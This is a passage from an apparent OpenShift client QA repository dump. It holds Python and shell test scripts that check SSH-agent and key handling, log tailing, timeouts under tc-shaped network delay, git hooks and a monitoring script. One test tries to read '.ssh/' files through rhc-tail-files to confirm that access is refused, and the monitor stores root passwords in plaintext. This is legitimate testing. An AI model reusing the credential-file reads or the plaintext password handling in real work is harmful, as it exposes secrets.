domain status ssh files permissons\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n common.env_setup()\n\n def finalize(self):\n os.system(\"killall ssh-agent\")\n self.debug(\"Restore libra ssh key pair\")\n os.system(\"test -f /tmp/id_rsa && test -f /tmp/id_rsa.pub && rm -f ~/.ssh/id_rsa ~/.ssh/id_rsa.pub && mv /tmp/id_rsa* ~/.ssh/\")\n self.debug(\"Restore remote ssh key\")\n common.update_sshkey()\n\n\nclass RhcChkLocalConfig(OpenShiftTest):\n def test_method(self):\n\n self.add_step(\"Run rhc domain status without ssh-agent running\",\n \"rhc domain status -l %s -p %s %s\" % (self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"ssh-agent fail because ssh-agent is not running\",\n #expect_str=[\"Could not open a connection to your authentication agent\"],\n expect_return=\"!0\")\n\n self.add_step(\"Run ssh-agent\",\n \"ssh-agent\",\n expect_description=\"ssh-agent starts successfully\",\n expect_return=0,\n expect_str=[\"Agent pid\"],\n output_filter=\"(?<=SSH_AUTH_SOCK=)[^;]*(?=;)\")\n\n self.add_step(\"export SSH_AUTH_SOCK to env\",\n common.set_env,\n function_parameters=[\"SSH_AUTH_SOCK\", \"__OUTPUT__[2]\"],\n expect_description=\"ssh-agent starts successfully\",\n #expect_str=[\"Agent pid\"],\n #output_filter=[\"(?<=SSH_AUTH_SOCK=)[^;]*(?=;)\"],\n expect_return=0)\n\n self.add_step(\"ssh-add libra private key\",\n \"ssh-add ~/.ssh/id_rsa\",\n expect_description=\"libra private key added\",\n expect_return=0,\n expect_str=[\"Identity added\"])\n \n self.add_step(\"Run rhc domain status with ssh-agent running\",\n \"rhc domain status -l %s -p %s %s\" % (self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description=\"rhc domain status detected ssh-agent\",\n expect_return=0,\n expect_str=[\"your system has passed all tests\"])\n\n 
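# note (added): the steps below rotate the local SSH key pair and assert that 'rhc domain status'\n # detects the local/remote key mismatch; fingerprints are compared via 'ssh-add -l' and 'ssh-keygen -lf'.\n 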
self.add_step(\"Backup the key pair\",\n \"mv ~/.ssh/id_rsa ~/.ssh/id_rsa.pub /tmp/\",\n expect_description=\"moved libra key pair to /tmp\",\n expect_return=0,\n expect_str=[])\n\n self.add_step(\"Generate a new pair of ssh keys\",\n \"ssh-keygen -t rsa -f ~/.ssh/id_rsa -N ''\",\n expect_description=\"Successfully created a key pair\",\n expect_return=0,\n expect_str=[\"identification has been saved\", \n \"public key has been saved\", \n \"The key fingerprint is\"])\n\n self.add_step(\"Compare the fingerprint of the one ssh-add holds and the new one on the filesystem\",\n \"[ $(ssh-add -l | cut -d' ' -f 2) == $(ssh-keygen -lf ~/.ssh/id_rsa | cut -d' ' -f 2) ] && echo 'yes' || echo 'no'\",\n expect_description=\"The two fingerprints are different\",\n expect_return=0,\n expect_str=['no'],\n unexpect_str=['yes'])\n\n self.add_step(\"Run rhc domain status without the new key loaded\",\n \"rhc domain status -l %s -p %s\" % (self.user_email, self.user_passwd),\n expect_description=\"rhc domain status should fail saying the key not loaded\",\n expect_return=\"!0\",\n expect_str=[\"assert !\\(@@remote_pub_keys\"])\n\n self.add_step(\"ssh-add new libra private key\",\n \"ssh-add ~/.ssh/id_rsa\",\n expect_description=\"new libra private key added\",\n expect_return=0,\n expect_str=[\"Identity added\"])\n \n self.add_step(\"Compare the fingerprint of the newly added key by ssh-add and the one on the filesystem\",\n \"[ $(ssh-add -l | cut -d' ' -f 2 | awk 'NR==2') == $(ssh-keygen -lf ~/.ssh/id_rsa | cut -d' ' -f 2) ] && echo 'yes' || echo 'no'\",\n expect_description=\"The two fingerprints are the same\",\n expect_return=0,\n expect_str=['yes'],\n unexpect_str=['no'])\n\n self.add_step(\"Run rhc domain status again with remote and local key dismatch\",\n \"rhc domain status -l %s -p %s\" % (self.user_email, self.user_passwd),\n expect_description=\"rhc domain status should fail because remote and local key don't match\",\n expect_return=\"!0\",\n expect_str=[\"assert !\\(@@remote_pub_keys\" ])\n\n self.add_step(\"Update the remote ssh key\",\n common.update_sshkey,\n expect_description=\"Remote ssh key altered successfully\",\n expect_return=0)\n\n self.add_step(\"Run rhc domain status again after altering the remote ssh key\",\n \"rhc domain status -l %s -p %s\" % (self.user_email, self.user_passwd),\n expect_description=\"rhc domain status should pass\",\n expect_return=0,\n expect_str=[\"your system has passed all tests\"])\n\n self.add_step(\"Change permissions of ssh key and config file\",\n \"chmod 644 ~/.ssh/id_rsa ~/.ssh/config\",\n expect_return=0)\n\n self.add_step(\"Run rhc domain status again\",\n \"rhc domain status -l %s -p %s\" % (self.user_email, self.user_passwd),\n expect_description=\"rhc domain status should fail because files have incorrect permissions\",\n expect_return=\"!0\",\n expect_str = [\"assert_match\\(permission, perms, error_for\" ],)\n \n self.add_step(\"Change permissions of ssh key and config file\",\n \"chmod 000 ~/.ssh/id_rsa ~/.ssh/config\",\n expect_return=0)\n\n self.add_step(\"Run rhc domain status again\",\n \"rhc domain status -l %s -p %s\" % (self.user_email, self.user_passwd),\n expect_description=\"rhc domain status should fail because files have incorrect permissions\",\n expect_return=\"!0\",\n expect_str=[\"assert_match\\(permission, perms\"])\n\n self.add_step(\"Change permissions of ssh key and config file\",\n \"chmod 600 ~/.ssh/id_rsa ~/.ssh/config\",\n expect_return=0)\n\n self.add_step(\"Run rhc domain status again\",\n \"rhc domain status -l 
%s -p %s\" % (self.user_email, self.user_passwd),\n expect_description=\"rhc domain status should pass\",\n expect_return=0,\n expect_str=[\"your system has passed all tests\"])\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcChkLocalConfig)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5132474303245544, "alphanum_fraction": 0.5201969146728516, "avg_line_length": 31.89047622680664, "blob_id": "8174c12931bdfc1b8209009d9dfec2d9f3f0f709", "content_id": "237616380bbbe38e591d25b6233d739a557ccdb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6907, "license_type": "no_license", "max_line_length": 149, "num_lines": 210, "path": "/automation/open/testmodules/RT/client/rhc_tail_files_check_RED.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_name = common.getRandomString(10)\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'ruby'\n\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass RHCTailFilesCheck(OpenShiftTest):\n def run_rhc_tail(self, app_name, arguments=None):\n \"Should return non zero if the command\"\n global rhc_tail\n url = OSConf.get_app_url(app_name)\n for i in range(1): #touch that app\n common.grep_web_page(url,'OpenShift')\n cmd=\"rhc-tail-files -a %s -l %s -p %s \"%(app_name, self.user_email, self.user_passwd)\n if arguments!=None:\n cmd += arguments\n print \"CMD=%s\"%cmd\n rhc_tail = subprocess.Popen(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)\n # make stdin a non-blocking file\n try:\n fd = rhc_tail.stdout.fileno()\n fl = fcntl.fcntl(fd, fcntl.F_GETFL)\n fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)\n except Exception as e:\n print \"ERROR: %s\"%str(e)\n return 1\n\n time.sleep(10)\n st = rhc_tail.poll()\n if (st==None):\n st=777\n return st\n\n def do_changes(self, app_name):\n uuid= OSConf.get_app_uuid(app_name)\n try:\n cmd = \"echo Jn316 >> /var/lib/openshift/%s/%s/logs/error_log-*\"%(uuid, app_name)\n (status, output) = common.run_remote_cmd(None, cmd, True)\n cmd = \"echo Jn316 >> /var/lib/openshift/%s/%s/logs/access_log-*\"%(uuid, app_name)\n (status, output) = common.run_remote_cmd(None, cmd, True)\n except:\n return 1\n\n return 0\n\n def verify():\n global rhc_tail\n text = None\n try:\n time.sleep(10)\n text = rhc_tail.stdout.read()\n except Exception as e:\n print \"ERROR: %s\"%str(e)\n return 1\n print \"DEBUG\",text\n obj = re.search(r\"Jn316\", text, re.MULTILINE)\n if obj:\n return 0\n\n return 1\n\n\n def test_method(self):\n rhc_tail = None\n ret_code = 0\n try:\n step=testcase.TestCaseStep(\"Let's have an app\",\n common.create_app,\n function_parameters=[self.app_name, 
common.app_types[self.app_type], self.user_email, self.user_passwd, False],\n expect_return=0)\n\n (status, output) = step.run()\n\n\n step = testcase.TestCaseStep(\"Run rhc-tail-files\",\n run_rhc_tail,\n function_parameters=[self.app_name],\n expect_return=777)\n\n (status, output) = step.run()\n\n step=testcase.TestCaseStep(\"Append some data to log files directly.\",\n do_changes,\n function_parameters=[self.app_name],\n expect_return=0)\n\n (status, output) = step.run()\n\n\n step=testcase.TestCaseStep(\"VERIFY rhc-tail-files\", verify, expect_return=0)\n\n (status, output) = step.run()\n \"We can now kill the process\"\n rhc_tail.send_signal(signal.SIGINT)\n rhc_tail.kill()\n\n step = testcase.TestCaseStep(\"Check direct call\",\n run_rhc_tail,\n function_parameters=[self.app_name,\n \"--file %s/logs/access_log-%s-000000-EST\"%(self.app_name,time.strftime(\"%Y%m%d\",time.localtime()))],\n expect_return=777)\n (status, output) = step.run()\n time.sleep(10)\n text = rhc_tail.stdout.read()\n obj = re.search(r\"HTTP\",text)\n if obj==None:\n raise testcase.TestCaseStepFail(\"Unable to launch't rhc-tail-files --files\")\n rhc_tail.send_signal(signal.SIGINT)\n rhc_tail.terminate()\n\n '''\n step = testcase.TestCaseStep(\"Check --file *\", \n run_rhc_tail,\n function_parameters=[self.app_name, '--file \"*\"'],\n expect_return=1)\n (status, output) = step.run()\n text = rhc_tail.stdout.read()\n print \"\\nDEBUG\",text\n print \"\\nEND__DEBUG\\n\"\n if (rhc_tail.poll()==None):\n rhc_tail.send_signal(signal.SIGINT)\n rhc_tail.terminate()\n\n '''\n step = testcase.TestCaseStep(\"Check --file .ssh/\",\n run_rhc_tail,\n function_parameters=[self.app_name, \"--file .ssh/\"],\n expect_description=\"We shouldn't be allowed\",\n expect_return=None)\n (status, output) = step.run()\n text = rhc_tail.stdout.read()\n print \"\\nDEBUG\",text\n print \"END__DEBUG\\n\"\n obj = re.search(r\"Could not find any files matching glob\",text)\n if obj==None:\n raise testcase.TestCaseStepFail(\"rhc-tail-files could read .ssh/ files\")\n\n if (rhc_tail.poll()==None):\n rhc_tail.send_signal(signal.SIGINT)\n rhc_tail.terminate()\n\n except testcase.TestCaseStepFail as f:\n print \"ERROR: %s\"%str(f)\n ret_code=1\n except Exception as e:\n print \"ERROR: %s\"%str(e)\n ret_code=254\n\n finally:\n common.command_get_status(\"rm -rf %s\"%self.app_name)\n if (rhc_tail != None):\n try:\n rhc_tail.send_ctrl_c()\n rhc_tail.send_signal(signal.SIGINT)\n rhc_tail.kill()\n rhc_tail.terminate()\n except:\n pass\n\n # sys.exit(ret_code)\n\t\n\tif step.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif step.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RHCTailFilesCheck)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6853725910186768, "alphanum_fraction": 0.6853725910186768, "avg_line_length": 30.97058868408203, "blob_id": "7244e6b234d8c6d2e81d764a8efee9c005086bb7", "content_id": "028dc9ea1811fe80bb6785fa31a282a7f2a7b307", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1087, "license_type": "no_license", "max_line_length": 112, "num_lines": 34, "path": "/automation/open/testmodules/RT/quick_start/quick_start_wolfcms.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": 
"#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\n\nclass QuickStartWolfcms(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"php\"]\n self.config.application_embedded_cartridges = [ common.cartridge_types[\"mysql\"]]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: WolfCMS\"\n self.config.git_upstream_url = \"git://github.com/openshift/wolfcms-example.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"I'm just a demonstration of how easy it is to use Wolf CMS to power a blog.\"\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartWolfcms)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6746987700462341, "alphanum_fraction": 0.6775336861610413, "avg_line_length": 26.134614944458008, "blob_id": "fb3e100982a14a7af22bdf2efb0aadf74189fe7e", "content_id": "271d83895b14a0f4139d874e58fe1c3f3b623fba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1411, "license_type": "no_license", "max_line_length": 80, "num_lines": 52, "path": "/automation/open/Longevity/performance_monitor.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n. ./common_func.sh\n\nserver_config()\n{\nif [ -f server.conf ];then\n\techo \"Will read config from server.conf\"\nelse\n\techo -n \"Please input the number of server you needed to monitor:\"\n\tread all\n\tno=0\n\t>server.conf\n\twhile (($no < $all));do\n\t\techo -n \"Please input the $no server's IP you needed to monitor: \"\n\t\tread server_ip\n\t\techo -n \"Please input (root)Password:\"\n\t\tread server_passwd\n\t\techo -n \"Please input the alias of your server:\"\n\t\tread server_alias\n\t\techo \"$server_alias $server_ip $server_passwd \">>server.conf\n\t\tno=$((no + 1))\n\tdone\nfi\n}\n\nconfirm_and_deployment()\n{\nwhile read server_alias server_ip server_passwd;do\n\techo \"Confirm your input :\"\n\techo_bold \"Alias: $server_alias,\t\tIP: $server_ip,\t\t\tPassword: $server_passwd\"\ndone < server.conf\necho -n \"If these info is all right, please input 'yes' to continue: (yes/no)\"\nread yes\nif [ \"$yes\" = \"yes\" ];then\n\twhile read server_alias server_ip server_passwd;do\n\t\trun scp_task \"record.sh\" $server_ip $server_passwd \"/opt\"\n\tdone < server.conf\nelse \n\techo \"Please run it again!\"\n exit 1\nfi\n}\n\nrun server_config\nrun confirm_and_deployment\ntail -f $1|while read app_info;do\n\techo_blue \"New app created, app info: $app_info\"\n\twhile read server_alias server_ip server_passwd;do\n\techo_green \"####################### $server_alias INFO #######################\"\n\trun task_ssh_root $server_ip $server_passwd \"/opt/record.sh\"\n\tdone < server.conf\ndone\n" }, { "alpha_fraction": 0.6302173137664795, "alphanum_fraction": 0.6350465416908264, "avg_line_length": 29.840425491333008, "blob_id": "06ec1aa9e9dfc5c72d715540791ee43e811f61e5", "content_id": "814b0e022593d1467dc10ee73116ce4a0736b31e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2899, "license_type": "no_license", "max_line_length": 160, 
"num_lines": 94, "path": "/automation/open/testmodules/RT/client/ruby_rest_client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.domain_name = common.get_domain_name()\n self.libra_server = common.get_instance_ip()\n\n tcms_testcase_id=135780\n\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\ndef rhc_rest_client_configuration():\n\n # Most of the operations require to be root\n if os.geteuid() != 0:\n print \"You have to run this script as root\"\n return 1\n\n configuration_steps = [\n \"if [[ $(ruby -e 'require \\\"rubygems\\\" ; puts Gem.available?(\\\"rhc-rest\\\")') == 'true' ]]; then gem uninstall rhc-rest -x ; fi\", # Cleaning\n \"cd /tmp\",\n \"if [[ -e os-client-tools ]]; then rm -Rfv os-client-tools/ ; fi\", # Cleaning\n \"git clone git://github.com/openshift/os-client-tools.git\",\n \"cd os-client-tools/rhc-rest/\",\n \"gem build rhc-rest.gemspec\",\n \"gem install rhc-rest\"\n ]\n\n ( ret_code, ret_output ) = common.command_getstatusoutput(\" && \".join(configuration_steps))\n return ret_code\n\n\nclass RubyRestClient(OpenShiftTest):\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Configuring RHC REST client\",\n rhc_rest_client_configuration,\n function_parameters = [ ],\n expect_description = \"The RHC REST client library must be installed successfully\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Testin Rhc::Rest::Client\",\n \"%s/rhc_rest_client_test.rb https://%s/broker/rest %s %s %s\" % ( WORK_DIR, self.libra_server, self.user_email, self.user_passwd, self.domain_name ),\n expect_description = \"Ruby RHC client library script should be executed without any errors\",\n expect_return = 0\n ))\n\n case = testcase.TestCase(\"[US1841][BusinessIntegration][Mirage] Ruby rest common client library\", self.steps_list )\n case.add_clean_up(common.alter_domain, [self.domain_name])\n case.run()\n\t\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RubyRestClient)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5675801038742065, "alphanum_fraction": 0.5780306458473206, "avg_line_length": 29.53191566467285, "blob_id": "d556fb95ba508f099465df05245763a63a82db75", "content_id": "62d228ae2230b0d13ecd6d23b1f545014116d04f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4306, "license_type": "no_license", "max_line_length": 104, "num_lines": 141, "path": "/automation/open/testmodules/RT/cartridge/custom_git_hook.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge] Custom git 
post-receive hook\nhttps://tcms.engineering.redhat.com/case/122274/\n\"\"\"\nimport sys,os\nimport testcase,common\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge] Custom git post-receive hook\"\n try:\n self.test_variant = self.config.test_variant\n except:\n self.info(\"Missing test_variant, used `php` as default\")\n self.test_variant = 'php'\n\n self.app_name = self.test_variant.split('-')[0] + common.getRandomString(7)\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n tcms_testcase_id=122274\n common.env_setup()\n common.clean_up(self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n\n self.steps_list = []\n\n def finalize(self):\n pass\n\nclass CustomGitHook(OpenShiftTest):\n def test_method(self):\n\n # 1. Create an app\n self.steps_list.append( testcase.TestCaseStep(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Custom git hook\n def add_build_hook():\n target_file_part = \"README.md\"\n hook_file_path = \"%s/.openshift/action_hooks/build\" % (self.app_name)\n try:\n f = open(hook_file_path,\"a\") #append ...\n f.write(\"\"\"\n#!/bin/bash\nfunction list_file(){\n command=\"ls -l $1\"\n echo \"Command: $command\"\n eval \"$command\"\n}\n\ntest_file=\"${OPENSHIFT_REPO_DIR}%s\"\nif [ -f $test_file ]; then\n list_file \"$test_file\"\nelse\n echo \"$test_file does not exist\"\n echo \"RESULT=1\"\n exit 1\nfi\n\nif [ ! -x $test_file ]; then\n echo \"$test_file does not have execute permission\"\n command=\"chmod +x $test_file\"\n echo \"Command: $command\"\n eval \"$command\"\n\n list_file \"$test_file\"\n\n if [ -x $test_file ]; then\n echo \"$test_file owns execute permission now\"\n echo \"RESULT=0\"\n exit 0\n else\n echo \"$test_file still does not have execute permission\"\n echo \"RESULT=1\"\n exit 1\n fi\nelse\n echo \"$test_file already owns execute permission!!!\"\n echo \"RESULT=1\"\n exit 1\nfi\"\"\" %(target_file_part))\n f.close()\n except:\n return 1\n\n return 0\n\n #cmd = \"echo '%s' >> %s\" % (testcode, hook_file_path)\n self.steps_list.append( testcase.TestCaseStep(\"2.Custom git hook\",\n add_build_hook,\n expect_description=\"git repo is modified successfully\",\n expect_return=0))\n self.steps_list.append( testcase.TestCaseStep(\"2.chmod +x for build\",\n \"chmod +x %s/.openshift/action_hooks/build\" % (self.app_name),\n expect_return=0))\n\n\n # 3.Git push all the changes and check the output\n self.steps_list.append( testcase.TestCaseStep(\"3.Git push all the changes and check the output\",\n 
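# note (added): the git push below triggers .openshift/action_hooks/build on the gear; the hook\n # written above prints RESULT=0 on success, which expect_string_list asserts.\n 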
&& git commit -am t && git push\" % (self.git_repo),\n expect_description=\"Git push should succeed\",\n expect_return=0,\n expect_string_list=[\"RESULT=0\"]))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CustomGitHook)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.49945029616355896, "alphanum_fraction": 0.5117009878158569, "avg_line_length": 49.93600082397461, "blob_id": "de1fc6f19579eaa5db2186fca7e81d23053f87c5", "content_id": "4d47c27c16b80ee402483e8b83832bbb1c90f702", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6367, "license_type": "no_license", "max_line_length": 147, "num_lines": 125, "path": "/automation/open/testmodules/RT/client/timeout_option_testing.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport common\nimport rhtest\nimport socket\nimport re\n\n# http://www.linuxfoundation.org/collaborate/workgroups/networking/netem\n# http://lartc.org/howto/lartc.qdisc.classful.html\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_type = common.app_types[\"php\"]\n self.app_name = common.getRandomString(10)\n common.env_setup()\n self.eth_device='eth0'\n self.info(\"Shaped device: %s\"%self.eth_device)\n self.timeout = 90 #seconds (should be greater then default)\n\n def finalize(self):\n self.reset_emulation()\n\n\nclass TimeoutOptionTesting(OpenShiftTest):\n def reset_emulation(self):\n try:\n self.debug(\"\\nCheck TC rules before action:\")\n common.command_get_status(\"sudo tc qdisc show dev %s\"%self.eth_device)\n self.debug(\"\\nRemoving TC rule...\")\n common.command_get_status(\"sudo tc qdisc del dev %s root\"%self.eth_device)\n self.debug(\"\\nCheck TC rules after action:\")\n common.command_get_status(\"sudo tc qdisc show dev %s\"%self.eth_device)\n self.debug(\"\\nDestroying app...\")\n common.destroy_app(self.app_name, self.user_email, self.user_passwd)\n os.system(\"rm -rf %s\"%self.app_name)\n except:\n pass\n\n def emulate_delay(self):\n if not re.search(r\"^\\d+\\.\\d+\\.\\d+\\.\\d+\",self.get_instance_ip()):\n ips = socket.gethostbyname_ex(self.get_instance_ip())[2]\n ip = [i for i in ips if i.split('.')[0] != '127'][0]\n else:\n ip = self.get_instance_ip()\n commands = [\n \"sudo tc qdisc add dev \"+self.eth_device+\" root handle 1: prio \",\n \"sudo tc qdisc add dev \"+self.eth_device+\" parent 1:3 handle 30: tbf rate 2kbit buffer 1600 limit 3000 \",\n \"sudo tc qdisc add dev \"+self.eth_device+\" parent 30:1 handle 31: netem delay 21s \", #should generate delay bigger than default (20s)\n #\"sudo tc qdisc add dev \"+self.eth_device+\" parent 30:1 handle 31: netem loss 99%% \",\n #\"sudo tc filter add dev \"+self.eth_device+\" protocol ip parent 1:0 prio 3 u32 match ip src %s/32 flowid 
1:3\"%ip,\n \"sudo tc filter add dev \"+self.eth_device+\" protocol ip parent 1:0 prio 3 u32 match ip dst %s/32 flowid 1:3\"%ip]\n return common.command_get_status(\" && \\n\".join(commands))\n\n def test_method(self):\n self.add_step(\"Simulate bad network: Set network delay as 5s using tc (This script must be run as root)\",\n self.emulate_delay,\n #command=\"sudo tc qdisc add dev %s root netem delay 5s\"%self.eth_device,\n expect_return=0)\n\n self.add_step(\"DEBUG\", \"sudo tc qdisc show dev %s \"%self.eth_device)\n self.add_step(\"Try to create app without timeout option (default is 20s)\",\n \"rhc app create %s %s -l %s -p '%s' --no-git --insecure\" %(self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd),\n expect_description=\"Should get executation exprired response message. App can not be created\",\n expect_return=\"!0\",\n expect_str=[\"Timeout::Error\"],\n try_count=2)\n\n ''' it's very hard to simulate such condition to test both scenarious in delayed environment'''\n self.add_step(\"DEBUG\", \"sudo tc qdisc show dev %s \"%self.eth_device)\n self.add_step(\"Create the same app with timeout option %ds\"%self.timeout,\n \"rhc app create %s %s -l %s -p '%s' --no-git --timeout %d --insecure\" %(self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n self.timeout),\n expect_description=\"App is created successfully\",\n try_count=2,\n expect_return=0)\n\n self.add_step(\"DEBUG\", \"sudo tc qdisc show dev %s \"%self.eth_device)\n self.add_step(\"Destroy the same app without timeout option (default is 10s)\",\n \"rhc app destroy %s -l %s -p '%s' --confirm --insecure\" %(self.app_name,\n self.user_email, \n self.user_passwd),\n expect_description=\"Should get executation exprired response message. App can not be destroyed\",\n expect_return=\"!0\",\n try_count=2,\n expect_str=[\"execution expired\"])\n\n self.add_step(\"DEBUG\", \"sudo tc qdisc show dev %s \"%self.eth_device)\n self.add_step(\"Destroy the same app with timeout option %d\"%self.timeout,\n \"rhc app destroy %s -l %s -p '%s' --confirm --timeout %d --insecure\" %(self.app_name, \n self.user_email, \n self.user_passwd, \n self.timeout),\n expect_description=\"App is destroyed successfully\",\n try_count=2,\n expect_return=0)\n\n self.info(\"[US1110][rhc-client] timeout option testing\")\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(TimeoutOptionTesting)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5124030113220215, "alphanum_fraction": 0.5166009664535522, "avg_line_length": 50.717105865478516, "blob_id": "44747e519ceb44dd26b08064057f64765677957b", "content_id": "5f81ebc93e6cec5adcf39914842784177d761d3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7861, "license_type": "no_license", "max_line_length": 201, "num_lines": 152, "path": "/automation/open/testmodules/RT/client/client_negative_testing.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = 
